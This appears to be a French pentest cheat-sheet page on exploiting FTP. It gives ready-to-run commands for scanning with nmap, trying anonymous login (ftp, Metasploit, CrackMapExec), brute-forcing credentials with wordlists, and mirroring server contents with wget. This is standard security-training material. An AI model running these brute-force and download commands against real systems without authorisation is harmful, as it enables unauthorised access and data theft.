📤FTP - port 21

Techniques d'exploitation du service File Transfert Protocole

Scan version

Exemple:

$ nmap -sS -sV -p21 <target IP>

Connexion anonyme

Le premier reflexe lorsqu'on rencontre un service ftp ouvert est de tenter de s'y connecter en anonyme.

$ ftp <target IP>
> anonymous
> anonymous

Avec metasploit:

$ msfconsole
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS <target(s) IP(s)>
msf auxiliary(anonymous) > set THREADS 55   #par exemple
msf auxiliary(anonymous) > run

avec CrackMapExec:

$ crackmapexec ftp <target ip[/24]> -u anonymous -p anonymous

Brute force

Si cela ne fonctionne pas, il existe un script dans nmap permettant de tenter de brute force l'identification.

Utilisation:

$ nmap --script ftp-* -p21 <target ip>

Avec metasploit:

$ msfconsole
msf > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set RHOSTS <target(s) IP(s)>
msf auxiliary(anonymous) > set THREADS 55   #par exemple
msf auxiliary(anonymous) > set USER_FILE <wordlist utilisateurs>
msf auxiliary(anonymous) > set PASS_FILE <wordlist mots de passes>
msf auxiliary(anonymous) > run

Téléchargement du contenu

Si la connexion anonyme est activée ou que les identifiant sont connues, il est également possible de télécharger les fichiers avec la commande wget.

Exemples d'utilisation:

$ wget -m ftp://anonymous:anonymous@<target IP>

$ wget -m --no-passive ftp://anonymous:anonymous@<target IP>

$ wget -m ftp://<username>:<password>@<target IP>

Ressources

https://www.offensive-security.com/metasploit-unleashed/scanner-ftp-auxiliary-modules/

Dernière mise à jour